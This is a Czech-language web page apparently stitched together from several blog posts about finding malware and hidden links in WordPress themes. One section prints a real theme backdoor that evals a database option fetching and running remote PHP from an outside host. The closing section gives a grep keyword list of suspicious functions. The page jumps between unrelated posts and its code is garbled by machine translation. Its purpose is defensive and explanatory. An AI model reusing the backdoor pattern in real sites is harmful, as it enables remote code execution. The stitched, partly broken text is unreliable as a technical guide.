Domov Poraďte

Jak zkontrolovat, zda téma WordPress neobsahuje viry. Jak změnit šablonu WordPress pro sebe: kontrola rozložení šablony podle pravidel SEO

15.06.2024

Ahoj přátelé IdeaFox!

Nevím jak vy, ale já mám v noci problémy se spánkem. Trápí mě bezpečnostní problémy blogu. už nemám sílu :-)

Četl jsem spoustu blogů na toto téma a testoval mnoho pluginů, které pomáhají tento problém vyřešit. A v komentářích se začali ptát na téma ochrany webu, což mě přimělo napsat tuto poznámku.

Jen si představte, že si vedete blog, píšete články, zkoušíte... A přijdou zlí kreténi a rozbijí váš web. Myslím, že bude hodně smutku.

Každý normální bloger totiž investuje spoustu času a úsilí do rozvoje svého webu. A pro mnohé se blogování obecně stává posedlostí... Tady a dokud, pokud se TOHLE stane :-)

Dobře, chápete, jak je to důležité.

Pojďme konečně na věc :)

Před pár měsíci jsem již napsal poznámku o hackování. Určitě si to přečtěte. Od té doby už ale uplynulo poměrně dost času a já jsem přijal dodatečná opatření k posílení všestranné obrany.

V následujících poznámkách se této problematice určitě podrobně budu věnovat. (Také si pamatuji a píšu o nastavení ISP)

3. Zkontrolujte stránky na jiných online službách

O takové služby není nouze. Zastávám pevný názor, že mnoho z nich je úplně hloupých a vytvořených výhradně pro zobrazování reklamy.

Doktor Web

Společnost DR.Web vytvořila dobrou službu pro kontrolu stránek online. Osobně mi jednou pomohl najít infekci na blogu přítele (v souboru .htaccess byl kód třetí strany)

Kontrola je velmi jednoduchá. Zadejte svou adresu URL a počkejte na výsledek ověření.

antivirus-alarm.ru

Výkonný skener webových stránek, který využívá až 43 antivirových databází od předních světových antivirových společností.

I zde je vše velmi jednoduché. Zadáme URL našeho webu a se zatajeným dechem čekáme na výsledky skenování.

Na tyhle jsem čekal.

Vše čisté, můžete klidně spát :-)

To vše je samozřejmě dobré, ale musíte si také nainstalovat pár pluginů, které blogům WordPress vůbec neublíží.

4. Požádejte svého hostitele, aby zkontroloval vaše stránky

Faktem je, že hostitelé se ještě více zajímají o bezpečnostní problémy než vy a mají silná bezpečnostní opatření. Navíc se speciálními ochrannými prostředky.

Toto je zpráva, kterou pro vás dnes mám. Dále vám řeknu o velmi výkonném pluginu, který dokáže výrazně ochránit váš blog WordPress před hackováním.

Pracuji s ním již 2 měsíce a jsem s ním velmi spokojen. Zatímco jsem na to přišel, 3x jsem si banoval: –) Zkrátka je co vyprávět.

Dobrý den, přátelé. Jste si jisti, že bezplatná šablona WordPress, kterou používáte pro své weby a blogy, je skutečně bezpečná a neobsahuje skryté hrozby nebo škodlivý kód? Jste si tím zcela jistý? Absolutně?)

Myslíte si, že jste šablonu prošli , odstranili z ní skryté odkazy a práce je hotová. Pravidelně skenujete soubory webu pomocí antiviru, podíváte se do nástrojů pro webmastery Yandex na kartě Zabezpečení a s úlevou uvidíte zprávu: „ Na stránce nebyl zjištěn žádný škodlivý kód«.

To jsem si taky myslel. Nerad bych tě naštval, ale...

Skrytý nebezpečný kód ve bezplatných šablonách WordPress

Toto je dopis, který jsem minulý týden obdržel e-mailem od své hostitelské společnosti. Nedávno zavedli pravidelnou kontrolu všech souborů webu, aby hledali škodlivý obsah, a našli tento obsah u mě!

Všechno to začalo, když jsem jednou odpoledne šel na svůj web a nemohl jsem ho spustit – objevila se urážlivá zpráva o tom, že soubory s příponou php nebyly nalezeny. Když jsem se trochu napnul, šel jsem prostudovat obsah složky s webem na hostingu a okamžitě jsem objevil problém - můj soubor šablony fuctions.php byl přejmenován na functions.php.malware, což jako by nejednoznačně napovídalo - antivirus byl pracuji zde nebo něco takového) Když jsem šel na poštu, našel jsem výše uvedenou zprávu od hostitele.

První věc, kterou jsem samozřejmě udělal, bylo začít kontrolovat tento soubor, studovat jeho obsah, skenovat jej všemi druhy antivirů, desítkami online antivirových služeb atd. — nakonec se nic nenašlo, všichni jednomyslně tvrdili, že spis je zcela bezpečný. Samozřejmě jsem hostiteli vyjádřil své pochybnosti s tím, že jste něco zpackal, ale pro každý případ jsem ho požádal o poskytnutí zprávy o zjištění škodlivého kódu.

A tohle mi odpověděli

Šel jsem na google informace o tomto kódu a myslel jsem vážně...

Jak najít kousek škodlivého kódu v šabloně

Jak se ukázalo, jde o skutečně netriviální techniku, která umožňuje zájemcům přenášet data na vaše stránky a měnit obsah stránek bez vašeho vědomí! Pokud používáte bezplatnou šablonu, pak Vřele doporučuji zkontrolovat váš functions.php následující kód:

add_filter('the_content', '_bloginfo', 10001);
funkce _bloginfo($content)(
globální $post;
if(is_single() && ($co=@eval(get_option(‘blogoption’))) !== false)(
vrátit $co;
) else return $content;
}

I při mé velmi povrchní znalosti PHP je jasné, že se vytváří určitý filtr vázaný na globální proměnnou příspěvek a obsah, které zodpovídají za zobrazování obsahu pouze na stránkách blogových příspěvků (podmínka is_single). Už je to podezřelé, že? Nyní se podívejme, co tento kód zobrazí na našem webu.

Velmi podezřele vypadá i zajímavá možnost blogoption požadovaná v databázi. Vstoupíme do naší databáze MySQL a najdeme tam tabulku s názvem wp_options, pokud jste nezměnili předpony, bude to ve výchozím nastavení vypadat takto. A v něm najdeme řádek, který nás zajímá, zvaný blogoption

Jaká krása! Vidíme následující možnost


return eval(file_get_contents(‘http://wpru.ru/aksimet.php?id=’.$post->ID.’&m=47&n’));

Tito. z určitého webu (a ruského, pozor) vrací obsah, který může obsahovat cokoliv! Libovolný počet odkazů, škodlivých kódů, pozměněného textu atd. Když vstoupíte na samotný web, zobrazí se vám chyba přístupu 403, což není překvapivé. Tuto možnost jsem samozřejmě také z databáze odstranil.

Podle informací od obětí se přesný obsah vašeho článku obvykle vrací pouze s jednou úpravou – namísto jakékoli tečky „.“ v textu byl skrytý otevřený odkaz! A mimochodem, tato možnost se zapíše do databáze při instalaci samotné šablony a poté se kód, který to dělá, úspěšně zničí. A s takovým svinstvem jsem žil dva roky a za celou tu dobu mi tuto hrozbu neidentifikoval ani jeden antivirus nebo služba. Abych byl upřímný, nevšiml jsem si, zda tento trik pro mě někdy fungoval, nebo zda můj bezpečnostní plugin tuto funkci zablokoval (nebo možná jedna z aktualizací WordPress tuto díru uzavřela), ale stále je to nepříjemné.

Morálka o volném sýru

Jak se vám líbí propracovanost našich „překladatelů“ šablon (nebo těch, kteří je dávají do svých katalogů)? To není pro vás, abyste vystřihovali odkazy z patičky) Škoda, že si nepamatuji, odkud jsem stáhl svou šablonu, bylo to dávno, jinak bych určitě napsal pár láskyplných. A kdybych v té době měl stejnou zkušenost jako nyní, rozhodně bych nepoužil šablonu zdarma, v krajním případě bych ji nestahoval z neznámých zdrojů!

Je snazší koupit si nějakou oficiální prémiovou šablonu za 15-20 babek a žít v klidu s vědomím, že v ní nejsou žádné díry ani šifrované odkazy, a i když tam jsou zranitelnosti, vývojáři určitě vydají aktualizaci, ve které tyto díry budou ZAVŘENO. ( Mimochodem, Artem nedávno zveřejnil článek, kde mluví o prémiových šablonách a dokonce rozdává propagační kódy na brutální slevy pro ty, kteří mají zájem)

Pro engine WordPress bylo vytvořeno velké množství bezplatných témat a šablon. Jediné, co musíme udělat, je najít tu správnou šablonu, stáhnout ji a nainstalovat na váš blog. Ve skutečnosti to dělá mnoho začínajících webmasterů. Přitom vůbec nepřemýšlí o tom, že tyto šablony mohou být pro jejich budoucí web nebezpečné. Šablony často vytvářejí běžní uživatelé enginu WordPress.

Někteří tvůrci do svých šablon umísťují hromadu externích odkazů, které mohou vést k velmi pochybným stránkám. Šablona například obsahuje velké množství odkazů na sexuálně zaměřené zdroje. Tyto odkazy nebudou zvenčí viditelné. Vyhledávací robot je však bude stále indexovat a přidělí těmto webům část vašeho citačního indexu. Kromě toho mohou být na váš zdroj uvaleny různé sankce (pokud existuje příliš mnoho odkazů na podezřelé stránky). Nabízí se otázka - co s takovými šablonami zdarma? Mimochodem, placené šablony také často trpí přítomností skrytých odkazů.

Jak zkontrolovat šablonu pro externí odkazy?

Plugin s názvem TAC (zkratka znamená Theme Authenticity Checker) vám pomůže zkontrolovat vaši šablonu na přítomnost externích odkazů v ní skrytých. Můžete si jej stáhnout z následující odkaz na oficiálních stránkách WordPress. Tento plugin je zcela zdarma a snadno se instaluje a používá.

Po aktivaci TAC musíte přejít na jeho parametry, které se nacházejí podél následující cesty - „Vzhled“ - „TAC“. Zde můžete vidět výsledky skenování všech motivů nainstalovaných na vašem blogu. Pokud je vše v pořádku s motivem, pak vedle jeho názvu bude zelený obdélník s nápisem „Theme OK!“.

Je třeba si uvědomit, že tento nápis znamená absenci jakýchkoli kódovaných odkazů. Všechny ostatní externí odkazy budou uvedeny níže. Pečlivě si prostudujte tyto odkazy a zkontrolujte, kam vedou. Každá šablona zpravidla obsahuje odkaz na webovou stránku svého tvůrce. Tento odkaz je obvykle viditelný pro návštěvníky blogu a nachází se v patičce.

Mezi webmastery je zvykem takové odkazy nemazat, protože jde o jakousi poctu autorovi šablony, který ji pro vás vytvořil zdarma. Pokud šablona obsahuje odkazy na nějaké jiné stránky, je lepší je odstranit. To lze provést pomocí otevření požadovaného souboru šablony.

tady skončím. Hodně štěstí! a do dalších článků.
S velkým respektem,

Líbil se vám článek? Přihlaste se k odběru novinek na blogu nebo sdílejte na sociálních sítích a já vám odpovím


3 komentáře k příspěvku “TAC plugin aneb jak zkontrolovat šablonu pro externí odkazy”

    Naskenoval jsem jim šablonu a ukázalo se - ok. I když něco přidá odkaz wp-load.php. Co ještě doporučujete?

    Dobrý den, milí čtenáři tohoto blogu. V dnešní době je málo webmasterů, kteří si své stránky navrhují sami (pomocí čistého Html, vlastního enginu nebo alespoň pomocí vlastních šablon pro CMS). Obecně to platí, protože ne každý je schopen vytvořit něco, co stojí za to - to vyžaduje talent designéra. Nejčastěji se to ukáže být přinejmenším „ne moc dobré“ a někdy „prostě hrozné“.

    To je důvod, proč se šablony nebo designová témata (v různých enginech mohou být „vzhledy“ označovány různými termíny) pro populární CMS tak rozšířené. Zvláště mnoho této dobroty lze nalézt na internetu pro Joomla a WordPress, protože je tomu tak právem, jak v RuNetu, tak na buržoazním internetu.

    Ve skutečnosti již existuje poměrně mnoho ruskojazyčných zdrojů s katalogy hotových šablon. No, v buržoazii je vůbec nespočítáte. Všechno se zdá být úžasné - nainstalujte engine, najděte vhodnou šablonu (není žádným tajemstvím, že placené šablony není tak těžké najít zdarma), stáhněte si ji a užijte si profesionální design svého nového webu. Zbývá do něj přidat hodnotný obsah a budete moci sledovat, jak popularita vašeho zdroje na internetu roste.

    Ale ne všechno je tak jednoduché a zřejmé. Když jsem kdysi dávno psal článek, dostával jsem celkem pravidelně od čtenářů poštou doporučení, abych tu či onu službu odstranil ze seznamu, protože v těch tam zveřejněných skryté odkazy nebo dokonce viry se nacházejí v šablonách. Ukazuje se, že přísloví je pravdivé – sýr zdarma najdete jen v pasti na myši. Vývojáři bezplatných šablon (nebo ti, kteří „nulují“ placené) tímto způsobem jednoduše vydělávají a soudě podle rozsahu i hodně.

    Skryté odkazy na zdroje třetích stran (a často na černé listině vyhledávačů) a ještě více viry mohou zabít všechny naděje na propagaci vašeho zdroje (nebo je vážně podkopat a zkazit vám nervy). Za to můžete buď. Jak se před tím vším chránit při výběru šablony?

    Co je špatného na bezplatných šablonách pro Joomla a WordPress?

    Z vlastní zkušenosti mohu říci, že pro „amatéra“ je velmi těžké konkurovat „profesionálovi“. Na samém začátku této publikace jsem uvedl odkaz na článek o virech, které infikovaly většinu mých stránek. Stalo se to před více než dvěma lety a během této doby jsem nejednou zopakoval epický boj o „čistotu kódu“, ale u řady infikovaných zdrojů stále dochází k recidivám se záviděníhodnou pravidelností (buď je z nich odesílán spam, nebo se tvoří doorway, pak se děje něco pro mě naprosto nepochopitelného, ​​což vede k monstrózně velkému zatížení hostingu).

    K hledání skořápek a jiných zadních vrátek v kódu těchto stránek přitom využívám všechny dostupné metody „nooba“, ale opět opakuji, že amatér prostě nemůže konkurovat profíkovi. Pokud si tedy myslíte, že virus, který se proplížil šablonou, můžete snadno odstranit, s největší pravděpodobností se mýlíte. To je velmi bezútěšná, strašně otravná záležitost (kdy se virová aktivita přes veškerou vaši snahu objevuje znovu a znovu) a vyžaduje spoustu času a úsilí.

    Stejný platí i pro skryté odkazy. Je dobré, když narazíte na možnost, jak je představit z minulé éry, kdy jste mohli jednoduše najít místo, kam je vložit a navždy se jich zbavit, a nakonec získat čistou a bezplatnou šablonu. Ve většině případů je vše mnohem složitější. Chcete-li zjistit, kam vložit skryté odkazy, budete potřebovat software (například plugin TAC), ale není všemocný, protože podnikání s distribucí odkazů prostřednictvím bezplatných a placených (hacknutých) šablon pro Joomla a WordPress přináší velmi dobré příjmy, což povzbuzuje lidi, kteří to praktikují, aby hledali nová řešení, díky nimž bude jejich „záložka“ méně nápadná.

    Ve skutečnosti může být dnes poměrně obtížné i rychle zkontrolovat šablonu pro generování „levých odkazů“. Například jste si stáhli šablonu, umístili ji na web, přidali obsah a rozhodli jste se zjistit, zda se z ní neobjevily nějaké podezřelé externí odkazy (nevložené vámi). Žádný z nich není. Jste šťastní, zapomeňte na tento problém, máte plné ruce práce s plněním stránek a jejich propagací a pak najednou (sami nebo po signálu z vyhledávačů v podobě filtru nebo zákazu) náhodně zjistíte, že stále existují skryté odkazy a vedou k takovému „svinstvu“, o kterém by vás samotného ani nenapadlo se zmiňovat.

    Nejurážlivější na tom je to odstranit filtr a „vybělit“ web v očích vyhledávačů Může to trvat velmi dlouho (v některých případech měsíce a dokonce roky). Jde však o to, že vývojáři takových „záložek“ si jsou vědomi, že o nich víte, a po instalaci šablony zkontrolují web, zda neobsahuje „všechny druhy špatných excesů“. Proto na nějakou dobu zpomalují začátek generování právě těchto odkazů, podle jejich názoru dostačující na to, aby i ten nejpodezřelejší uživatel uvěřil v čistotu šablony, kterou dostal zdarma.

    Skryté odkazy jsou nyní navíc zakódovány tak, aby nebyly prohledávány pomocí slov md5 nebo base64 (často jsou načítány z externího zdroje). Pouze sada písmen a speciálních znaků, které nelze najít prohledáním všech souborů šablon. A těchto souborů může být více než sto. Navíc se odkazy nezobrazují okamžitě. To znamená, že je ve skutečnosti pro webmastera (průměr) nemožné odhalit ve fázi tvorby webu.

    Abych se vyhnul infekci přes šablonu, já Raději platím peníze abych později nemusel řešit hromadu problémů. Další věc je, že můžete zaplatit hodně peněz, nebo můžete zaplatit málo. Osobně volím druhou možnost, ale nejprve vysvětlím podstatu první.

    Něco se samozřejmě najde a v oficiálních úložištích těchto motorů(přečtěte si o tom a přejděte na oficiální stránky rozšíření pro Joomlu), ale za prvé, výběr je výrazně omezený a za druhé mnoho tisíc dalších stránek po celém světě bude oblečeno do stejného „oblečení“, což poněkud snižuje jedinečnost vašeho projektu jak v očích návštěvníků, tak v očích vyhledávačů.

    Ve světě však existuje mnoho profesionálních společností, které vyvíjejí placené šablony pro Joomla a WordPress. A priori () by neměli mít záložky, jinak okamžitě ztratí autoritu a důvěru klientů. Cena za jednu šablonu však může být 50-100 dolarů v závislosti na její funkčnosti a novosti.

    Navíc mohou nastat problémy s platbou (budete muset buď zariskovat a nakoupit s platbou přímo z plastové karty). V důsledku toho však obdržíte záměrně „čistou“ šablonu, což je dobré. Je pravda, že technická podpora, která je s ním dodávána, bude relevantní pouze v případě, že znáte jazyk, ve kterém je poskytována. Ve většině případů vám v této věci nepomůže znalost ruského jazyka.

    Druhá možnost se mi líbí více kvůli její vyšší ziskovosti (poměr utracených peněz k obdrženým příležitostem), i když ve vztahu k developerům není úplně „nabíledni“. Jeho podstatou je, že Joomla a WordPress šířeno pod licencí GNU/GPL, tj. licence na svobodný software (takový software lze používat, kopírovat, upravovat a distribuovat). Vlastně už jsem o tom psal dříve v článku o Joomla šablonách zmíněném úplně na začátku.

    Aniž bychom zacházeli do přílišných podrobností, jde o to, že rozšíření (šablony, pluginy atd.) pro tyto motory nemohou být soukromým majetkem autorů. Ano, můžete za ně požadovat platbu, ale již nebude možné trestat nebo stíhat neoprávněné používání nebo šíření těchto rozšíření. Navzdory tomu je trh s placenými rozšířeními pro Joomla a WordPress obrovský není chráněn autorským zákonem. Naopak, licence GNU/GPL vás 100% chrání před vývojářem.

    Mnoho vývojářských společností mimochodem poskytuje přístup ke svým šablonám prostřednictvím předplatného. Tito. zaplatíte určitou částku a po určitou dobu si můžete všechny jejich výtvory (šablony či rozšíření) průběžně stahovat a nadále používat. Druhý způsob, jak bezpečně získat témata pro WordPress, stejně jako šablony pro Joomla, je vlastně založen na přibližně stejném principu.

    Před nedávnem na něj „ukázal prstem“ můj kamarád, kterého jsem zmiňoval v řadě článků (už několik let hledá ideální variantu pro vybudování internetového obchodu a na této cestě nachází spoustu věci, které se mi zdají zajímavé a v budoucnu aktivně využívány) . Mluvíme o sdružování prémiových šablon a rozšíření CmsHeaven.org .

    Podstata sbírky je celkem jednoduchá – kupte si produkt a distribuujte ho všem, kteří se do sbírky zapojili. CmsHeaven.org toto schéma ještě více zjednodušil – není třeba hledat jednotlivé šablony nebo rozšíření, která potřebujete. Jednoduše zaplatíte za dočasný přístup k celému katalogu, kterým tato služba disponuje (několik tisíc titulů, rozdělených pro snadné vyhledávání podle vyhledávačů, autorů a témat).

    Každý z prezentovaných produktů byl poctivě zakoupen od vývojářů za peníze vkladatelů (existují i ​​šablony zdarma, ale opět je prezentují známé značky, které potřebují pro reklamní účely). A co je důležité, organizátoři katalog neustále aktualizují o nové výtisky (jak se říká ve vedru), na které si veřejnost bude muset ještě dlouho počkat. Mnoha lidem se to bude líbit.

    Obecně se jedná o družstvo, kde se můžete připojit a využívat všechny výhody. Ale s určitými omezeními. Faktem je, že organizátoři dobře vědí, že bez zavedení omezení celý jejich katalog během chvíle unikne na veřejnost. Proto se koná limit na 36 stažení za měsíc. To je docela dost pro běžného webmastera a dokonce i společnost pro tvorbu webových stránek.

    To zaručuje absence v prezentovaných rozšířeních a šablonách "záložky"(skryté odkazy, viry, trojské koně a snitche, které informují vývojáře o webu pomocí jejich šablony). Vzhledem k tomu se nakupují pouze produkty známých značek s open source, kde lze toto vše zkontrolovat a případně odstranit.

    Některá rozšíření byla přeložena do ruštiny, a pokud se vyskytnou problémy s instalací nebo konfigurací, která je často velmi potřebná (pravděpodobně jste nejednou pročesávali internet při hledání řešení problému, který se objevil zčistajasna) . Mimochodem, to je to, co odlišuje bezplatné motory od placených, že neexistuje žádná uživatelská podpora jako taková.

    A budete si moci stáhnout produkty, které se vám líbí, normální rychlostí a bez prohlížení reklam na souborových hostingových službách. Je to maličkost, protože k získání kýženého „roztomile“ můžete hory přenášet a nejen bojovat se službou hostování souborů, ale jsou to maličkosti, které tvoří pohodlí.

    Obecně se mi nápad a jeho implementace velmi líbily, ale mám používat bezplatné šablony z repozitářů Joomla a WordPress, mám se připojit na CmsHeaven.org nebo si šablony koupit přímo od vývojářů? budete se muset rozhodnout sami. Jen „prosím vás, nejezte v noci syrová rajčata“, to znamená, nestahujte si bezplatné produkty z žádných „úžasných“ zdrojů, protože můžete skončit se spoustou problémů. Potřebuješ to?

    Hodně štěstí! Brzy se uvidíme na stránkách blogu

    Mohlo by vás to zajímat

    Jak vložit kód počítadla návštěv na stránky se systémem Joomla pomocí modulu Custom HTML code nebo přímo do šablony
    Jak si sami vytvořit profesionální vizitkový web bez znalosti Html, CSS a PHP? Odpověď: MotoCMS!
    Jak získat adaptivní šablonu pro budoucí web a s ní intuitivní a rychlý CMS pro spuštění
    10 smrtelných chyb při psaní a publikování článků
    Vytvoření položky nabídky v Joomle pro vstup do fóra a přenos registrace uživatele z SMF na web
    Nastavení JFusion pro spojení fóra SMF a webu Joomla
    Moduly JFusion pro zobrazování zpráv z fóra na webu, stejně jako vytvoření tlačítka v SMF pro návrat do Joomly WebPoint PRO je responzivní téma WordPress se širokou funkčností a kompetentní technickou optimalizací pro vyhledávače
    Share42 - skript pro přidávání tlačítek a záložek sociálních sítí na web (existuje možnost plovoucího panelu)
    Instalace fóra SMF – integrace Joomla 1.5 a fóra Simple Machines pomocí komponenty JFusion

    WordPress je nejoblíbenější engine pro vytváření různých informačních webů a blogů. Zabezpečení vašeho webu je více než zabezpečení vašich dat. To je mnohem důležitější, protože jde také o bezpečnost všech uživatelů, kteří čtou váš zdroj a důvěřují mu. Proto je tak důležité, aby stránka nebyla infikována viry nebo jiným škodlivým kódem.

    Na to, jak ochránit WordPress před hackováním, se podíváme v jednom z následujících článků, ale nyní vám chci říct, jak zkontrolovat web WordPress na přítomnost virů a škodlivého kódu, abyste se ujistili, že je vše v bezpečí.

    Úplně první možnost, která vás napadne, je, že vás napadli hackeři a zabudovali jste jejich zadní vrátka do kódu vašeho webu, abyste mohli rozesílat spam, vkládat odkazy a další špatné věci. To se občas stává, ale jedná se o poměrně vzácný případ, pokud aktualizujete software včas.

    Existují tisíce bezplatných WordPress témat a různých pluginů a to už může být hrozba. Jedna věc je, když si stáhnete šablonu z webu WordPress a úplně jiná, když ji najdete na levém webu. Bezohlední vývojáři mohou do svých produktů vkládat různé škodlivé kódy. Riziko je ještě větší, pokud si zdarma stáhnete prémiové šablony, kam hackeři, aniž by cokoli riskovali, mohou přidat jakousi bezpečnostní díru, kterou pak mohou proniknout a dělat, co potřebují. To je důvod, proč je kontrola webu WordPress na viry tak důležitá.

    Kontrola webu WordPress na přítomnost virů

    První věc, na kterou se musíte při kontrole webu obrátit, nejsou viry, jedná se o pluginy WordPress. Rychle a snadno můžete naskenovat svůj web a najít podezřelé oblasti kódu, které stojí za pozornost, ať už jsou v tématu, pluginu nebo samotném jádru Wodpress. Podívejme se na některé z nejpopulárnějších pluginů:

    1.TOC

    Tento velmi jednoduchý plugin kontroluje všechna témata nainstalovaná na vašem webu, zda neobsahují škodlivý kód. Plugin detekuje skryté odkazy zašifrované pomocí vkládání kódu base64 a také zobrazuje podrobné informace o nalezených problémech. Nejčastěji nalezené části kódu nejsou viry, ale mohou být potenciálně nebezpečné, takže byste jim měli věnovat pozornost.

    OTEVŘENO "Vzhled" -> "TAC" pak počkejte, dokud nebudou zaškrtnuta všechna témata.

    2. VIP skener

    Velmi podobný TOC topic scanner, ale zobrazuje podrobnější informace. Stejné možnosti pro detekci odkazů, skrytého kódu a dalších škodlivých vložek. Stačí otevřít položku VIP Scanner v sekci nástrojů a analyzovat výsledek.

    Možná bude stačit smazat nepotřebné soubory, například desktop.ini. Nebo se musíte podrobněji podívat na to, co se děje v souborech pomocí base64.

    3. Anti-Malware z GOTMLS.NET

    Tento plugin umožňuje nejen skenovat témata a jádro webu na viry, ale také chránit web před hesly hrubou silou a různými XSS, SQLInj útoky. Vyhledávání se provádí na základě známých signatur a zranitelností. Některé zranitelnosti lze opravit na místě. Chcete-li zahájit skenování souborů, otevřete "Anti-malvare" v postranní nabídce a klikněte "Spustit skenování":

    Než budete moci spustit skenování, musíte aktualizovat své databáze podpisů.

    4. Wordfence

    Toto je jeden z nejpopulárnějších pluginů pro zabezpečení WordPress a skenování malwaru. Kromě skeneru, který dokáže najít většinu záložek v kódu WordPress, je tu neustálá ochrana proti různým typům útoků a heslem hrubé síly. Plugin během vyhledávání najde možné problémy s různými pluginy a tématy a hlásí nutnost aktualizace WordPressu.

    Otevřete kartu "WPDefence" v postranní nabídce a poté přejděte na kartu "Skenovat" a stiskněte "Začni skenovat":

    Skenování může nějakou dobu trvat, ale po dokončení se zobrazí podrobná zpráva o nalezených problémech.

    5. Antivirus

    Toto je další jednoduchý plugin, který prohledá šablonu vašeho webu na škodlivý kód. Nevýhodou je, že se naskenuje pouze aktuální šablona, ​​ale informace se zobrazí dostatečně podrobně. Uvidíte všechny nebezpečné funkce, které se v motivu nacházejí a následně můžete podrobně analyzovat, zda představují nějaké nebezpečí. Najděte položku "antivir" v nastavení a poté klikněte "Skenovat šablony motivů nyní":

    6. Kontrola integrity

    Je také vhodné zkontrolovat integritu souborů WordPress, v případě, že se virus již někam zapsal. K tomu můžete použít plugin Integrity Checker. Kontroluje všechny soubory jádra, pluginů a šablon na změny. Na konci kontroly se zobrazí informace o změněných souborech.

    Online služby

    Existuje také několik online služeb, které vám umožňují zkontrolovat web WordPress na přítomnost virů nebo zkontrolovat pouze šablonu. Tady jsou některé z nich:

    themecheck.org- stáhnete si archiv motivů a uvidíte všechna varování o možných škodlivých funkcích, které se v něm používají. Můžete nejen zobrazit informace o svém motivu, ale také o dalších motivech nahraných jinými uživateli a také o různých verzích motivu. Cokoliv pluginy najdou, lze nalézt na této stránce. Kontrola vašeho WordPress motivu je také velmi důležitá.

    virustotal.com- dobře známý zdroj, kde můžete zkontrolovat svůj web nebo soubor šablony, zda neobsahuje viry.

    ReScan.pro- skenování webu WordPress na přítomnost virů pomocí této služby je zdarma, je prováděna statická a dynamická analýza pro zjištění možných přesměrování; Kontroluje web proti různým blacklistům.

    sitecheck.sucuri.net- jednoduchá služba pro skenování webů a témat na výskyt virů. Existuje plugin pro WordPress. Detekuje nebezpečné odkazy a skripty.

    Ruční kontrola

    Nic nemůže být lepší než ruční kontrola. Linux má tento úžasný nástroj grep, který vám umožňuje vyhledávat výskyty libovolných řetězců ve složce se soubory. Zbývá pochopit, co budeme hledat:

    eval - tato funkce umožňuje spouštět libovolný PHP kód, nepoužívají ji seberespektující produkty, pokud tuto funkci používá některý z pluginů nebo téma, je téměř 100% pravděpodobnost, že obsahuje virus;

    • base64_decode- šifrovací funkce lze použít ve spojení s eval ke skrytí škodlivého kódu, ale lze je použít i pro mírové účely, takže buďte opatrní;
    • sha1- jiný způsob šifrování škodlivého kódu;
    • gzinflate- kompresní funkce, stejné cíle, společně s eval, například gzinflate(base64_decode(code);
    • strrev- otočí řádek zpět ne dříve, protože možnost může být použita pro primitivní šifrování;
    • tisk- odesílá informace do prohlížeče, spolu s gzinflate nebo base64_decode je to nebezpečné;
    • file_put_contents- WordPress sám nebo pluginy mohou stále vytvářet soubory v systému souborů, ale pokud to téma dělá, měli byste být opatrní a zkontrolovat, proč to dělá, protože mohou být nainstalovány viry;
    • file_get_contents- ve většině případů se používá pro mírové účely, ale může být použit ke stažení škodlivého kódu nebo čtení informací ze souborů;
    • kučera- stejný příběh;
    • fopen- otevře soubor pro zápis z jakéhokoli důvodu;
    • Systém- funkce provede příkaz v systému Linux, pokud to dělá samotné téma, plugin nebo wordpress, s největší pravděpodobností je tam virus;
    • symbolický odkaz- vytváří v systému symbolické odkazy, možná se virus snaží zpřístupnit hlavní souborový systém zvenčí;
    • kopírovat- zkopíruje soubor z jednoho místa na druhé;
    • getcwd- vrátí název aktuálního pracovního adresáře;
    • cwd- změní aktuální pracovní složku;
    • ini_get- přijímá informace o nastavení PHP, často pro mírové účely, ale nikdy nevíte;
    • error_reporting(0)- zakáže výstup jakýchkoli chybových zpráv;
    • window.top.location.href- funkce javascript používaná pro přesměrování na jiné stránky;
    • hacknutý- takže, pro případ, zkontrolujeme, najednou se nám to hacker rozhodl říct.

    Každé jednotlivé slovo můžete nahradit příkazem takto:

    grep -R "hacknut" /var/www/path/to/files/wordpress/wp-content/

    Nebo použijte jednoduchý skript, který vyhledá všechna slova najednou:

    values="base64_decode(
    eval(base64_decode
    gzinflate(base64_decode(
    getcwd();
    strrev(
    chr(ord(
    cwd
    ini_get
    window.top.location.href
    kopírovat(
    vyhodnotit(
    Systém(
    symbolický odkaz (
    error_reporting(0)
    tisk
    file_get_contents(
    file_put_contents(
    fopen(
    hacknutý"

    cd /var/www/path/to/files/wordpress/wp-content/
    $ fgrep -nr --include \*.php "$values" *